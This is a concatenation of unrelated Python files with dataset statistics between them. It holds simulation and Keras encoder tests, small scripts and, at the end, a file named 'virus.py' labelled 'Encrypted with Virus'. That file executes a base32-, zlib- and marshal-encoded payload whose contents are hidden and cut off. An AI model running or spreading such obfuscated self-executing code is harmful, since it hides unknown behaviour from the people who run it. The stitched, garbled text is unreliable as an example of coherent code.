    """When a list of teleports is given as a choice, exactly one is used."""
    component = ActionRestrictionsComponent({
        'teleports': [[{
            'step': 3,
            'position_x': 1,
            'position_z': 2,
            'rotation_y': 45
        }, {
            'step': 6,
            'position_x': 2,
            'position_z': 4,
            'rotation_y': 90
        }]]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    chosen = teleports[0]
    assert chosen.step in [3, 6]
    assert chosen.position_x in [1, 2]
    assert chosen.position_z in [2, 4]
    assert chosen.rotation_y in [45, 90]
    scene = component.update_ile_scene(prior_scene())
    goal = scene['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    assert len(actions) in [3, 6]
    possible = [
        'EndHabituation,xPosition=1,zPosition=2,yRotation=45',
        'EndHabituation,xPosition=2,zPosition=4,yRotation=90'
    ]
    teleport_count = 0
    for idx, step_actions in enumerate(actions):
        assert isinstance(step_actions, list)
        if idx in [2, 5] and len(step_actions) == 1:
            teleport_count += 1
            assert step_actions[0] in possible
        else:
            assert step_actions == []
    # Exactly one of the two choices should have produced an action.
    assert teleport_count == 1
def test_action_restriction_teleport_multi():
    """Multiple teleports each produce their own EndHabituation action."""
    step1 = 3
    step2 = 5
    step3 = 9
    component = ActionRestrictionsComponent({
        'teleports': [{
            'step': step1,
            'position_x': 1,
            'position_z': 2,
            'rotation_y': 45
        }, {
            'step': step2,
            'rotation_y': 90
        }, {
            'step': step3,
            'position_x': -3,
            'position_z': -1
        }]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    assert teleports[0].step == step1
    assert teleports[0].position_x == 1
    assert teleports[0].position_z == 2
    assert teleports[0].rotation_y == 45
    assert teleports[1].step == step2
    assert teleports[1].position_x is None
    assert teleports[1].position_z is None
    assert teleports[1].rotation_y == 90
    assert teleports[2].step == step3
    assert teleports[2].position_x == -3
    assert teleports[2].position_z == -1
    assert teleports[2].rotation_y is None
    scene = component.update_ile_scene(prior_scene())
    goal = scene['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    # The list is sized by the latest teleport step.
    assert len(actions) == step3
    # Only the fields provided for each teleport show up in its action.
    expected_by_index = {
        step1 - 1: 'EndHabituation,xPosition=1,zPosition=2,yRotation=45',  # noqa: E501
        step2 - 1: 'EndHabituation,yRotation=90',
        step3 - 1: 'EndHabituation,xPosition=-3,zPosition=-1',
    }
    for idx, step_actions in enumerate(actions):
        assert isinstance(step_actions, list)
        if idx in expected_by_index:
            assert step_actions == [expected_by_index[idx]]
        else:
            assert step_actions == []
def test_action_restriction_teleport_multi_overwrite_error():
    """Two teleports on the same step conflict and raise at update time."""
    step = 2
    component = ActionRestrictionsComponent({
        'teleports': [{
            'step': step,
            'position_x': 1,
            'position_z': 2,
            'rotation_y': 45
        }, {
            'step': step,
            'rotation_y': 90
        }]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    first, second = teleports[0], teleports[1]
    assert first.step == step
    assert first.position_x == 1
    assert first.position_z == 2
    assert first.rotation_y == 45
    assert second.step == step
    assert second.position_x is None
    assert second.position_z is None
    assert second.rotation_y == 90
    # Both teleports target the same step, which is not allowed.
    with pytest.raises(ILEException):
        component.update_ile_scene(prior_scene())
def test_action_restriction_freeze_teleport_combined():
    """A non-overlapping freeze and teleport can coexist in one scene."""
    tstep = 2
    start = 5
    end = 8
    component = ActionRestrictionsComponent({
        'teleports': [{
            'step': tstep,
            'position_x': 1,
            'position_z': 2,
            'rotation_y': 45
        }],
        'freezes': [{
            'begin': start,
            'end': end
        }]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    assert teleports[0].step == tstep
    assert teleports[0].position_x == 1
    assert teleports[0].position_z == 2
    assert teleports[0].rotation_y == 45
    freezes = component.get_freezes()
    assert freezes[0].begin == start
    assert freezes[0].end == end
    scene = component.update_ile_scene(prior_scene())
    goal = scene['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    # The list is sized by whichever restriction reaches furthest.
    assert len(actions) == max(end - 1, tstep)
    teleport_action = 'EndHabituation,xPosition=1,zPosition=2,yRotation=45'  # noqa: E501
    for idx, step_actions in enumerate(actions):
        assert isinstance(step_actions, list)
        if idx == tstep - 1:
            assert step_actions == [teleport_action]
        elif start - 1 <= idx < end:
            # Frozen steps are forced to 'Pass'.
            assert step_actions == ['Pass']
        else:
            assert step_actions == []
def test_action_restriction_freeze_teleport_overwrite_error():
    """A freeze that covers a teleport's step conflicts and raises."""
    step = 2
    component = ActionRestrictionsComponent({
        'teleports': [{
            'step': step,
            'position_x': 1,
            'position_z': 2,
            'rotation_y': 45
        }],
        'freezes': [{
            'begin': step,
            'end': step + 3
        }]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    assert teleports[0].step == step
    assert teleports[0].position_x == 1
    assert teleports[0].position_z == 2
    assert teleports[0].rotation_y == 45
    freezes = component.get_freezes()
    assert freezes[0].begin == step
    assert freezes[0].end == step + 3
    # Both restrictions want to write the same step's action.
    with pytest.raises(ILEException):
        component.update_ile_scene(prior_scene())
def test_action_restriction_passive_teleport():
    """In a passive scene every step is 'Pass' except the teleport step."""
    step = 2
    component = ActionRestrictionsComponent({
        'passive_scene': True,
        'teleports': [{
            'step': step,
            'position_x': 1,
            'position_z': 2,
            'rotation_y': 45
        }]
    })
    teleports = component.get_teleports()
    assert isinstance(teleports, list)
    assert teleports[0].step == step
    assert teleports[0].position_x == 1
    assert teleports[0].position_z == 2
    assert teleports[0].rotation_y == 45
    assert component.get_passive_scene()
    scene = component.update_ile_scene(prior_scene(100))
    goal = scene['goal']
    assert isinstance(goal, dict)
    actions = goal['action_list']
    assert isinstance(actions, list)
    # Passive scenes fill every step of the scene (prior_scene(100) here).
    assert len(actions) == 100
    teleport_action = 'EndHabituation,xPosition=1,zPosition=2,yRotation=45'  # noqa: E501
    for idx, step_actions in enumerate(actions):
        assert isinstance(step_actions, list)
        expected = teleport_action if idx == step - 1 else 'Pass'
        assert step_actions == [expected]
def test_action_restriction_passive_freeze_error():
    """Freezes are not allowed together with passive_scene."""
    step = 2
    component = ActionRestrictionsComponent({
        'passive_scene': True,
        'freezes': [{
            'begin': step,
            'end': step + 3
        }]
    })
    assert component.get_passive_scene()
    freezes = component.get_freezes()
    assert freezes[0].begin == step
    assert freezes[0].end == step + 3
    # A passive scene already fixes every action, so a freeze conflicts.
    with pytest.raises(ILEConfigurationException):
        component.update_ile_scene(prior_scene(100))
| 27.688732
| 94
| 0.569917
| 2,291
| 19,659
| 4.727193
| 0.056307
| 0.09012
| 0.036934
| 0.046722
| 0.851247
| 0.808772
| 0.778116
| 0.748846
| 0.726962
| 0.717267
| 0
| 0.030986
| 0.3138
| 19,659
| 709
| 95
| 27.727786
| 0.771831
| 0.014446
| 0
| 0.726678
| 0
| 0
| 0.077253
| 0.021224
| 0
| 0
| 0
| 0
| 0.337152
| 1
| 0.03928
| false
| 0.032733
| 0.00491
| 0
| 0.045827
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a9f157631f5f873a5efe7847fb04440419279c4b
| 71
|
py
|
Python
|
python/baseline/dy/__init__.py
|
domyounglee/baseline
|
2261abfb7e770cc6f3d63a7f6e0015238d0e11f8
|
[
"Apache-2.0"
] | null | null | null |
python/baseline/dy/__init__.py
|
domyounglee/baseline
|
2261abfb7e770cc6f3d63a7f6e0015238d0e11f8
|
[
"Apache-2.0"
] | null | null | null |
python/baseline/dy/__init__.py
|
domyounglee/baseline
|
2261abfb7e770cc6f3d63a7f6e0015238d0e11f8
|
[
"Apache-2.0"
] | 3
|
2019-05-27T04:52:21.000Z
|
2022-02-15T00:22:53.000Z
|
from baseline.dy.dynety import *
from baseline.dy.transformer import *
| 23.666667
| 37
| 0.802817
| 10
| 71
| 5.7
| 0.6
| 0.421053
| 0.491228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 38
| 35.5
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e7890d5743d1ceba1c1edcb69d8ca35595903963
| 99
|
py
|
Python
|
past_archive/swexpert/1938(arithmeticOperation).py
|
DongHyunByun/algorithm_practice
|
c726c69d35306d23467f4af6e10f2db6fdc68234
|
[
"MIT"
] | null | null | null |
past_archive/swexpert/1938(arithmeticOperation).py
|
DongHyunByun/algorithm_practice
|
c726c69d35306d23467f4af6e10f2db6fdc68234
|
[
"MIT"
] | null | null | null |
past_archive/swexpert/1938(arithmeticOperation).py
|
DongHyunByun/algorithm_practice
|
c726c69d35306d23467f4af6e10f2db6fdc68234
|
[
"MIT"
] | null | null | null |
# Read two integers from one input line and print their sum, difference,
# product, and integer quotient, one result per line.
nums = list(map(int, input().split()))
x, y = nums[0], nums[1]
# Bug fix: int(x / y) goes through float division, which loses precision
# for large integers; floor division stays exact (inputs here are the
# positive integers of the original judge problem).
print(f"{x + y}\n{x - y}\n{x * y}\n{x // y}")
| 33
| 65
| 0.494949
| 28
| 99
| 1.75
| 0.392857
| 0.163265
| 0.244898
| 0.326531
| 0.306122
| 0.306122
| 0.306122
| 0.306122
| 0.306122
| 0.306122
| 0
| 0.082474
| 0.020202
| 99
| 2
| 66
| 49.5
| 0.42268
| 0
| 0
| 0
| 0
| 0.5
| 0.555556
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
99b5f4959a0dbe73d89bba0e34fd6acfa4404e70
| 1,922
|
py
|
Python
|
test.py
|
anmolgaba21/ATCC-Collision
|
7a76e10d38059bf6820bc7fca800320c6e703be4
|
[
"MIT"
] | null | null | null |
test.py
|
anmolgaba21/ATCC-Collision
|
7a76e10d38059bf6820bc7fca800320c6e703be4
|
[
"MIT"
] | null | null | null |
test.py
|
anmolgaba21/ATCC-Collision
|
7a76e10d38059bf6820bc7fca800320c6e703be4
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow as tf

# 50 rows of [x1, y1, x2, y2] bounding-box coordinates: the first ten are
# real detections, the remaining forty are zero padding (fixed batch size).
_boxes = [
    [306., 215., 515., 375.],
    [685., 188., 951., 380.],
    [850., 216., 1046., 348.],
    [713., 71., 950., 227.],
    [163., 204., 386., 322.],
    [775., 310., 1052., 488.],
    [953., 217., 1188., 367.],
    [518., 164., 636., 327.],
    [603., 145., 752., 272.],
    [626., 125., 733., 298.],
]
_boxes += [[0., 0., 0., 0.]] * 40
# Bug fix: the original passed `dtype=float32`, but the bare name `float32`
# is never defined (only `np` and `tf` are imported), so this line raised
# NameError. The TensorFlow dtype object is `tf.float32`.
array = tf.constant(_boxes, dtype=tf.float32)
| 35.592593
| 52
| 0.17898
| 213
| 1,922
| 1.615023
| 0.239437
| 0.924419
| 1.377907
| 1.825581
| 0.465116
| 0.465116
| 0.465116
| 0.465116
| 0.465116
| 0.465116
| 0
| 0.333725
| 0.557232
| 1,922
| 53
| 53
| 36.264151
| 0.070505
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.038462
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
99ccb12bab23c9892feb8168bd2ca7f51320d7ad
| 3,937
|
py
|
Python
|
tests/test_encoders.py
|
psmaAaron/keras-fcn
|
90843ef7465e0ce289f0a45a62d2d176a932e7ab
|
[
"MIT"
] | null | null | null |
tests/test_encoders.py
|
psmaAaron/keras-fcn
|
90843ef7465e0ce289f0a45a62d2d176a932e7ab
|
[
"MIT"
] | null | null | null |
tests/test_encoders.py
|
psmaAaron/keras-fcn
|
90843ef7465e0ce289f0a45a62d2d176a932e7ab
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow.keras.backend as K
from tensorflow.keras.layers import Input
from keras_fcn.encoders import (
VGG16,
VGG19)
from tensorflow.keras.utils.test_utils import keras_test
@keras_test
def test_vgg16():
    """Check VGG16 encoder pyramid shapes and pretrained-weight handling."""
    for fmt in ['channels_first', 'channels_last']:
        K.set_image_data_format(fmt)
        if K.image_data_format() == 'channels_first':
            x = Input(shape=(3, 500, 500))
            # Expected feature-pyramid shapes, deepest output first.
            expected_shapes = [
                (None, 4096, 16, 16),   # drop7
                (None, 512, 32, 32),    # pool4
                (None, 256, 63, 63),    # pool3
                (None, 128, 125, 125),  # pool2
                (None, 64, 250, 250),   # pool1
            ]
            conv1_weight = -0.35009676
        else:
            x = Input(shape=(500, 500, 3))
            expected_shapes = [
                (None, 16, 16, 4096),
                (None, 32, 32, 512),
                (None, 63, 63, 256),
                (None, 125, 125, 128),
                (None, 250, 250, 64),
            ]
            conv1_weight = 0.429471
        encoder = VGG16(x, weights='imagenet', trainable=False)
        feat_pyramid = encoder.outputs
        assert len(feat_pyramid) == 5
        for feat, shape in zip(feat_pyramid, expected_shapes):
            assert K.int_shape(feat) == shape
        # Pretrained layers are frozen and carry the imagenet weights.
        for layer in encoder.layers:
            if layer.name == 'block1_conv1':
                assert layer.trainable is False
                weights = K.eval(layer.weights[0])
                assert np.allclose(weights[0, 0, 0, 0], conv1_weight)
        # A from-scratch encoder is trainable and starts from other weights.
        encoder_from_scratch = VGG16(x, weights=None, trainable=True)
        for layer in encoder_from_scratch.layers:
            if layer.name == 'block1_conv1':
                assert layer.trainable is True
                weights = K.eval(layer.weights[0])
                assert not np.allclose(weights[0, 0, 0, 0], conv1_weight)
@keras_test
def test_vgg19():
    """Check VGG19 encoder pyramid shapes and pretrained-weight handling."""
    for fmt in ['channels_first', 'channels_last']:
        K.set_image_data_format(fmt)
        if K.image_data_format() == 'channels_first':
            x = Input(shape=(3, 500, 500))
            # Expected feature-pyramid shapes, deepest output first.
            expected_shapes = [
                (None, 4096, 16, 16),   # drop7
                (None, 512, 32, 32),    # pool4
                (None, 256, 63, 63),    # pool3
                (None, 128, 125, 125),  # pool2
                (None, 64, 250, 250),   # pool1
            ]
            conv1_weight = -0.35009676
        else:
            x = Input(shape=(500, 500, 3))
            expected_shapes = [
                (None, 16, 16, 4096),
                (None, 32, 32, 512),
                (None, 63, 63, 256),
                (None, 125, 125, 128),
                (None, 250, 250, 64),
            ]
            conv1_weight = 0.429471
        encoder = VGG19(x, weights='imagenet', trainable=False)
        feat_pyramid = encoder.outputs
        assert len(feat_pyramid) == 5
        for feat, shape in zip(feat_pyramid, expected_shapes):
            assert K.int_shape(feat) == shape
        # Pretrained layers are frozen and carry the imagenet weights.
        for layer in encoder.layers:
            if layer.name == 'block1_conv1':
                assert layer.trainable is False
                weights = K.eval(layer.weights[0])
                assert np.allclose(weights[0, 0, 0, 0], conv1_weight)
        # A from-scratch encoder is trainable and starts from other weights.
        encoder_from_scratch = VGG19(x, weights=None, trainable=True)
        for layer in encoder_from_scratch.layers:
            if layer.name == 'block1_conv1':
                assert layer.trainable is True
                weights = K.eval(layer.weights[0])
                assert not np.allclose(weights[0, 0, 0, 0], conv1_weight)
| 38.980198
| 73
| 0.586487
| 518
| 3,937
| 4.262548
| 0.150579
| 0.081522
| 0.04529
| 0.067935
| 0.896739
| 0.896739
| 0.896739
| 0.896739
| 0.896739
| 0.896739
| 0
| 0.112974
| 0.303023
| 3,937
| 100
| 74
| 39.37
| 0.691691
| 0
| 0
| 0.847059
| 0
| 0
| 0.037084
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 1
| 0.023529
| false
| 0
| 0.058824
| 0
| 0.082353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99d01c8775e8f0a323fb3aaa664efceede8c150c
| 29,617
|
py
|
Python
|
virus.py
|
Darkrulex/P91D
|
eb1e47926827c2cbf3ad76fb3b4542d6ae8317f8
|
[
"Apache-2.0"
] | null | null | null |
virus.py
|
Darkrulex/P91D
|
eb1e47926827c2cbf3ad76fb3b4542d6ae8317f8
|
[
"Apache-2.0"
] | null | null | null |
virus.py
|
Darkrulex/P91D
|
eb1e47926827c2cbf3ad76fb3b4542d6ae8317f8
|
[
"Apache-2.0"
] | null | null | null |
#Encrypted with Virus
#Created by OVERDOSIS
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b32decode("PCOO3PIJOQOMS6JGDBMQPAF2OAPQJL2OWK55TYABKQKY4AWQNRFA2ATESMRACQQFWLIU3GQDEUVBGQACVCBZKCISNCIZFHRJRNWI7LAZL4NF6GW3WJL3FZCD6I6M7DF54NR6IOOWFOG574326Z42ZXM5LGX4PM732ZV675PW7HGVWPNPG37D6IXSVDFKUAV2JE2AAFKBAQRCGMZC7Y4PFDZ7X3746PZSQT7QXUW727U274NGT4IJL7UXZA5CDN5NXBCG4SZC5YR3O7JC5YT3P7JCDYQLOAZCDYSLOG2EXSI5Y3QU6ETHFO2JYRB6I5SIYTB6I5SYYQR6I5SEYSR6I5SUYRR6I5SMYSN4T3LGRT52BLTMBO452QREXD3JH5KWSJWSHN63RCSBDMW2J3KAA6JMCFU7GI2E5MQGUEBOU3XL4RTOO4JC2QCWXOEEUCLNESHWTK52RHLEGVCKL4EC5NJQLE4EJNDO6LDBKGS5HVCFM66JMNBKI637J3TFKSXPMGRFESUPCCK5E6EUVCKLUY2EUV2B2JZKEXTQLIVWIIOSUJKFEZVDXOL5QJWLKCXSJ6JNWJ6JPSXJGSESUCZAHKOMJHSC3NMT3R7JDKC54T3EWGF6JTKG44X3CTIZXCHWRIQJUET2BCUKJGOUL2JLE32QWKHIQG2HFPOTQRSSFKS7GBP2Q4JHPAR6O2FKQJ7JCWW7OJP2Q5LHTCVEN33RD3JU6QBVABT5OCDKRL7AYUZJ2G3HBGCOOMHMY5YIBKD54TJTIERH5JUYYJEIPIDCGSNCT3C4QICRZ5QWJCFI7UMBSJXKABDENCA2Y5EIVKAJCFEWEZEUVCBRQGJD5KIIQDDDMSOKQIYYPGK2QKKR4AULS7M6VBRXR6I2KHDTC4UBVCXWFZCDIQ6Y7EIPCP2TLDF4J3KAWGEZEDVIOMDSSGUB7RWIERIV7R6ICRISOMDSRGUBOMLSTGUJGGDZQOUFGGFZIK2KWRF5ITLHZJEY6ZVXDHBQHEOPHON6ZP2P3UV7JP7435CJGRVIM2LQOOS2QKPKNQ7L7TWSLJUDBGOP4W2IZKPHOOLYVRL42GENBNDCK3XC6LWJAPTKNKJ75WQOLPHR762BF7MTT77QSYQE5BWUQN5BADCWZIDBGKIURDEO3HIXDI4RI2H5YSM6D4P4ZWXRUQRT52UIB446FQ4O7CECHHWKDKKAYUWQBOB3FHRTJRSX2XK6Z6XWOFGT3DZBD4SKHD6AVL7DCV2VDJX7NCUI5YJ7DZMRZEFNHMBZQMRA3OM4NRXAC2DB6GY3POC4OPZWGYSVW5ZQ7HWVSR5GW7M22WJLFMG7H6OFW5P3CM35NRWDCP2AUN3CNGSCNHACVLGHGBGXNUXQG3IGWZ4COJ4J4AJATSLU2Y3DVS4DDVRYJKXSGE4SBMQ6XCCZK33NWU7SE4YGKFUKUX7SRPLBPH5765XUNSEJGM4I4RGGZGBL7ERLX5JKQZXV4TO7TKJ56GUS2MJ3OLVTFRHPVX6QZWKY2RLHQ2UYT5FV6SW6XF66WKPEZYMTS4X4UV5HMTTZHL5HN5GE6TC6XEY4LHY3YLTW5XVYOFOZ5GMYX3SCNAJ7GOGM7TCPZTFDHN5GF5PEVC3HZYTEOEZDYNRYGQZDMNB255XBLMYGR7A3DJHOPX6R27LZL6GIIBBO5O5O443DNT6LCM43LGGXKU4ZSOBPJ7V7F6CNPG3JRFZPN3UOW2X4UPLT5GQ4JCHCPRQGNGHMJYDZ7HA73U7SISQ3BLWNNOF5O5BTHYZDIORQSSJPXLS5XE4X37M4XSXK62PSDNNGMLL7LJ7FGKY26SCY2D6TXITFPCXZVQLKPEZBGEYDYNBYHSIBYS6K2P4UK7K5SPTZIJNFVCFZF3S4XY4DCE57GQ6XD7XSYXVZG4K5LW4DURNDCNX4MB4HYZU65RCACL7I7H57XMG
IX5A7WUNRGGAZ7OMYOE2GF6GWZ5RPFX3GOLD62G72RZGUA65GVLXI6IGGKEVP74GF3UND4I4UHT7WV7SHIOZBU6MZAYEGNDBKLNZGF5O367TJ42TNDY2R526Q2ZK5G63YYE7ULZDFWXY7TC6JSVSUHU7ZDSLIQZYVHS5M4TZOX6PFVUVXGU5TCNDKORYJ4ZLECM4A4NWRQWVRL5M5M4RGS2TNB7WVFHLYBTW35R77BYCB75JL5GHN34UK425ZJRPNKVBES4LGJUQ4LCFATMWKOV6ZT5TYVOUGRRJUBP6VU3SZU5GQE7VYMEXI2ZMELQB37EZA3N6FCQSO7SEPEWN24ZFCAPGAMJTPV2ASX7KUWTB7RAHSALXYZBVAAWHXEOES5UW7EQAVVZK2TAKP6FUW5PZKYVFGUBAQGBENCA2ECEECEAGEDBAGSQK26NSCRGVU2IBPZCHXYIBQHT2JDHUHQT2NB65M5JTKR6URT46PJE6VCDOINO2QB4SII4JRYHRKRACBQNLFDORDNCB4UIRAN4QHTDCWLO2DBI3ESXFFBHMQWDNEYHQFZBBYSPAMSC2QMUR4EXI5KB6XVNGY77TBRXWKVVSINCIQJLLZ542FF4LIV2XZXDWVRTIUJQ5TZAFC4XGAEHH2Y22K2GAAKMTOVAM2LKGG6WWGSLL4IXRSKGR2HDA5X6INLGS5GRS6KHXGXMVRWFUGJCQFTBTENP73YEVXIPXH4UUVVOH4WYTE6KWZNQ7KOGXSVRBNTRAVEUT56KA2APXBYEYF7ENH3FNRJAO4XFDH5ANXORMRM4UY3BSGD4YF4LWJUJTPKHD57PS3JMTIFLZLKIRN7DTIVES3GNFMS4IVPNGVXX2S4RFXJ4QXFGR2FLY2ZWMTPTVYOPOCRSXTFN2N3JNPCKS5VKRBZ4VTBYJ52DQ5LQYX2PXKAG5X2LZLKS3PKOHIUPPYUCWAOFPZK2AVMPFPVRV3ZTPQ7AK4KOHHPZYDEX6YSKX5D7V3UYYEUJQYEULVPFCV3KYTTRKIXIZ5B7SYU2H5GMTHSSJANU7E5MNHJZONXQYYFOLONLC6ZRRG6TO2KTO5CT24ZLXIIVELHRXLXKZKZCZGDMXQEY2QS757GBJNE4BXGMC6RXDR6KADSQWTWVYOAO3DZYTWKF4TBMEMZMN3AKGOOEDDF6LMPRFCTLQVG7LLLTPY5R4HEKU6KX2FZHB6OJPSXQXUVM3J6FGP7HKAO7ELXZKYJZANCTJIYLOD2SZMROJIC7GWGBCIY4EARCBGZBOVO35AHTEBRXAG4XZECHQZU3WIHNSD3PCJIB2F3XKPQG4TG42OJ3VUNUFXVLVQMGNE2WHCXUG42MANZS3KZGKYUJE3HGZANJBPGFQYIV6VACR6IVPTK7DKJXNUUYREXNCQTAB3NP4TK3CKGHMQOEYNQM2JJA2VMFQUVYP6CS2HECPOJEGVETAKJJ7KTF76QWMPXJ4DU22UQ3KSXASD2LFV7HNKLKAU62K6OCMVHWF3YP7A4T6Q25EKAOH4OFIADCNQ7WAO6B4EE6L4ENYHMYEQLNRTAMFLZCHDT45FRMAG34LKCCMNW2QDWAU4VPJJN6TAWRJP4XK4QGHHOOJXJFPQAGJ2OHA622FKPOCWQTOMWA6EOK6XAB4ZFDOQDLCGMDBWTMLHSYIGFDGRZYOINLLGE6GUIGM3UVA3HG6FAJH2KDEVAYO6FWKO44KWL7FYPIAH73KC7YFNHQWMV5UTTGGDNFSA6ZY5N7BXEUJJVQGCYKIZNUYZ6X6D24QKW7KYYH2X4APTLXAHTECTWINA5NYBNT5WM4MDJ3YJYPFFKALDIAJMR27H6IPDWC66HOAJLFS7VJSPVZUGWBI5DA2C5Y34QNRVGBHU5GXQBEOATQ7GDRHN3XEZ3ZC57KPM23RMKLEUDHS4Z7T7JXBSPP33Q2G3O46U6RMB2PDKAXPPTVA4RE5G6JIT526KYOZ4Q7JTPG4TJW3A63HBAZF3BSR
JXKZCV5WE4CUHVVWNHSQ24SNNM4Q3EIH72JZISTWX3VU5CHEEHOZFWPTONCJI5HYQ3WE5CQ6HJK5AFKTEMWLEP3O4BVMAZPOXORVRLIVNCT7EW2ABCFLI6WDEDJJNRMX6WMGIY2GKHBLH53FLY4GMHGRWTKU57UTBLOHEKEIJXLMSUY2RQYM63NRPO7JRPDXWCJGTNUIABTLJDB3ZYJNLAYO6QIFSG5CTLUSHBDP742U3DGGS3STJDDSTJLHONEWKSWJ4QIOAI6KXD6ZKTIEYW44GO4LS3TBTAW6CP7JEOYO6IBVV6R56AMOMOLYF5BXYPVCOPFCIR7TF7SRITJQFFHHYS6LSSMIP4ISH6HYV7ZBID72RDTSOD2RUZ6IQ2EUNR6MPAP32AL27ADPHDSRUPQOHNERIYNCADK6TA4HTPYGDJP6ODRVSQ4B6ZYP7IWBIPG7Q4FBREPSMHOAXEIWOE5MHMOYILOYYQFPT4INVQEABTCFDDOMHSKQP7T4J3HEKBLTJD6SDEQX7GNYHIRZKUOUBT6AUJ42ZTCE2DNAYVW7Q7YS2SUXTELWOCJT4XAOR77UC4RVJSGLVW7GA4OUIMBYF25VZ3UWBGJ7C5M4CAPKYN3AMPSZ5YQPGCF55Z2F4GHTXLCYUPWCFBTQDIR7SGHDLLL3CGXD3DGTBKHGQXTQHQMXLE6UJFLNSIH3T3ZB6M7ACTFZ2PY75HRYVPHWT23UTMSQINJE4M373NTLIDTAUXCGIW3YM2B73YEA5K3VHI4DH3FDLGWG5CCZGFY4QIPFLTY7GRB3ZTND3I7HPBBAHKSGJEC4UL7EJJIOABIQZ6ZMXO4GXQKMBP6F3Z47Q5DSEUXWPNBKEIMQM63AGBSIDGOWAY7AATAFLAZOXAMJRWZU63UDKTY2O4KXHYUOJVQM4ASWKHNYBRQYRS66DXGOP2ES47XCYY6W2QIK7UTZDHXKCQDMJ2N2OHEPJZVVSRNKCRPU2SPP5JCY3LSXJXTDHWMFEQ6KIXZ4PJUWMI5XLYLOL27JDPZELK6XMVV3PXRYUHRX5HMQ5DV4RQYKBMTNFJ3WDVTISKWMRZ2QWH2OTQIGIUFDDXCDYAW4Z6XNCNQVH7X4AR2R7YIUO6L4OB6LEG3GCBFS3WNJRGNZPZFZ3OJRHF7G42XN6OVOX55LULD3QSHR2XJWZSGP2KTH53V6XKU4Y6M5GB54HL6UQ4D22NHTF4KT3DLSR4YHJF26S4JBJNLT7ZDHXGG2ZHZGRZDA6AZWWTINQACJYIPNVMBO6EPJ23UKDVRGI2OYRNECPOC4UAILUGO75TB2NQEQLXCJNZKKK4BYQ7VM2B26TXAPEJ2IP6D3RQXIL3SYXECKT7RAJ5MHY6W47HFPHCLU6EJZMWX5NS5JYAB3S3BAC6YANADHD24SVYUZI7WYCG3ZBKQYKKTIC42YIZERKBXPZKMHUIHBVOA347EA4MRMZUHHWFEB6WH7KRVQNXLJVAUL4PWLUVQQXIDTUDGP6MYBHQPLD44QBEI4HT65NXCZSF3QSQBEDD2QJU64PZH6HYLSBMXOQRIO4PHEYPMXOX5CYSFWEKXFCKV43RHFDIBQCJYAJLBUPVVDWMKZR3OQOBR2IO2HSBDJVEXFNMM3LTVZCKPZB4SEUJHXYZCJB6FBMT4QQBFEY5VRP2CQARSY5UAOQBEKO7I7FOCMZQLQWSY4GYXLVOFJJ4SQOKK5ELIWPSFUGKEL53DRWYHHSNSMPUM6IEUMWOFTQAELT3Q3XFCJVRUYNSNXP5OAAHKZYCTGEM2QCGNWDA44BPBBSW3V37LAXBVJR5JW3LMJS43ZMUFWDNI4ZB7ZMKNOK2BWPC3ZIZOAOAS43JK3EBOLTMIUJDEDJHA6EFA6BAROA7SOGGFNZMDDTWY5ZSVZV7FKV5BTM5EJ5RHQA2A3SNR7KQZAWSRMOQGFYDKAUNC6ZSN4VOX4SUZMASSRGCEHMGIVXT6NE3S7Y27ZHD4FMLQLJ5S3
